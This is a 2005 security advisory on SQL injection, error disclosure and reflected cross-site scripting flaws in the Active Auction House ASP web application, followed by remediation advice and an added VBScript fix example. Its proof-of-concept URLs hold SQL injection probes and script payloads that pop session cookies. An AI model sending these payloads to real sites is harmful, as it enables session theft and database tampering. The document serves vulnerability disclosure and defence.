-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Active Auction House has multiple SQL injection, error disclosure and XSS vulnerabilities
Date: 06/04/2005
Vendor: Active Web Softwares
Vendor Website: www.activewebsoftwares.com

Summary: Active Auction House (installed here under /activeauctionsuperstore/) passes several request parameters unfiltered into SQL queries run against its Microsoft Access database, returns the raw ODBC error text (including the server-side script path and line number) to the client, and reflects other parameters into HTML without encoding. The result is SQL injection, information disclosure and cross-site scripting.

Proof of Concept Exploits:

SQL injection and error disclosure. A single quote in the parameter is enough to break the query; the text under each URL is what the server sends back to the browser.

http://localhost/activeauctionsuperstore/default.asp?catid='SQL_ERROR
SQL ERROR
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/activeauctionsuperstore/displaycategories.asp, line 52

http://localhost/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemName 'SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ''SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39

(The fragment 'ItemName 'SQL_INJECTION' in the error shows that the sort column and sort direction are concatenated straight into the ORDER BY clause, so these two cannot be fixed with a bound parameter alone; see Possible Fixes.)

http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemID='SQL_INJECTION'.
/activeauctionsuperstore/ItemInfo.asp, line 18

http://localhost/activeauctionsuperstore/sendpassword.asp
SQL INJECTION
Enter a SQL injection string in the Email field of the form. For example, entering 'SQL_INJECTION returns:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.
/activeauctionsuperstore/sendpassword.asp, line 45

Cross-site scripting. Each URL reflects the marked parameter into the page unencoded; the payload closes the surrounding attribute and tag and pops the session cookie in an alert box.

http://localhost/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
Pops cookie

http://localhost/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account
Pops cookie

http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&accountid=
Pops cookie

Possible Fixes:
Active Auction House is classic ASP (VBScript) on a Microsoft Access database reached through ODBC, so PHP/MySQL functions such as htmlspecialchars() or mysql_real_escape_string() do not apply to this code base. The equivalent measures are:

- Never concatenate request values into SQL. Use ADODB.Command with typed parameters (CreateParameter / Parameters.Append) for values such as itemID, catid and the Email field, and convert numeric IDs with CLng() after checking them, so a quote can never reach the Jet engine.
- Column names and sort directions (Sortby, SortDir) cannot be bound as parameters. Compare them against a fixed list of allowed values and fall back to a default when they do not match.
- Encode every value written back into HTML with Server.HTMLEncode(), and put encoded values only inside double-quoted attributes: Server.HTMLEncode() does not encode the apostrophe, which is why the '><script> payloads above break out of single-quoted attributes.
- Stop sending raw ODBC errors (provider, script path, line number) to the browser. Disable "Send detailed ASP error messages to client" in IIS, trap errors in the script and return a generic error page; log the details server-side only.
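The fixes above, as an added worked example in classic ASP (VBScript). This is not code from Active Auction House or from the advisory; the table and column names (Items, ItemID, ItemName, Price, EndDate), the DSN name and the hidden-field name are assumptions. It shows the vulnerable concatenation pattern implied by the error messages beside a parameterized ADODB.Command, an allow-list for the Sortby/SortDir identifiers that a parameter cannot protect, error trapping that keeps the ODBC text off the page, and attribute-safe output encoding.

```vbscript
<%
' Added example, not Active Auction House code. Table/column names
' (Items, ItemID, ItemName, Price, EndDate) and the DSN are assumptions.
Option Explicit

' ADO constants (values from adovbs.inc) so the page needs no include file.
Const adCmdText    = 1
Const adInteger    = 3
Const adParamInput = 1

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "DSN=activeauction"   ' assumed DSN pointing at the Access .mdb

' --- 1. Vulnerable pattern (what the error messages imply) --------------
' sql = "SELECT * FROM Items WHERE ItemID=" & Request.QueryString("itemID")
' Set rs = conn.Execute(sql)
' A quote in itemID reaches the Jet engine unchanged, and the raw ODBC error
' (with script path and line number) is written straight to the browser.

' --- 2. Fixed: validate, then bind the value as a typed parameter --------
Function GetItem(itemIdText)
    Set GetItem = Nothing
    ' Only a short run of digits may pass; IsNumeric() alone accepts "1e3".
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If Not re.Test(itemIdText) Then Exit Function

    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT ItemID, ItemName, Price FROM Items WHERE ItemID = ?"
    cmd.Parameters.Append cmd.CreateParameter("ItemID", adInteger, adParamInput, , CLng(itemIdText))

    ' Trap provider errors: log them server-side, never echo Err.Description.
    On Error Resume Next
    Set GetItem = cmd.Execute
    If Err.Number <> 0 Then
        Err.Clear
        Set GetItem = Nothing
    End If
    On Error GoTo 0
End Function

' --- 3. Identifiers (Sortby / SortDir) cannot be parameters: allow-list --
Function SafeOrderBy(column, direction)
    Dim cols, i, c, d
    cols = Array("ItemName", "Price", "EndDate")   ' assumed sortable columns
    c = "ItemName"                                  ' default when no match
    For i = 0 To UBound(cols)
        If StrComp(column, cols(i), vbTextCompare) = 0 Then c = cols(i)
    Next
    d = "ASC"
    If StrComp(direction, "DESC", vbTextCompare) = 0 Then d = "DESC"
    ' Only values from our own lists are ever concatenated.
    SafeOrderBy = " ORDER BY [" & c & "] " & d
End Function

' --- 4. Output: encode, and use a double-quoted attribute ----------------
' Server.HTMLEncode escapes < > & " but NOT the apostrophe, so a
' '><script> payload still escapes from a single-quoted attribute.
Function HiddenField(name, value)
    HiddenField = "<input type=""hidden"" name=""" & Server.HTMLEncode(name) & _
                  """ value=""" & Server.HTMLEncode(value) & """>"
End Function

' Usage: ItemInfo-style lookup plus the reflected ReturnURL field.
Dim rs
Set rs = GetItem(Request.QueryString("itemID"))
If rs Is Nothing Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid request."                ' generic, no ODBC text
ElseIf Not rs.EOF Then
    Response.Write Server.HTMLEncode(rs("ItemName")) & " - " & rs("Price")
    rs.Close
End If
Response.Write HiddenField("ReturnURL", Request.QueryString("ReturnURL"))
conn.Close
%>
```

SafeOrderBy is what the gentable.asp listing page would call with Request.QueryString("Sortby") and Request.QueryString("SortDir"); an unknown column silently falls back to ItemName rather than being echoed into the query or the error page.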
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with PHP.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
lWYvwOWmoKGHgDKanamGDcvc
=GAwn
-----END PGP SIGNATURE-----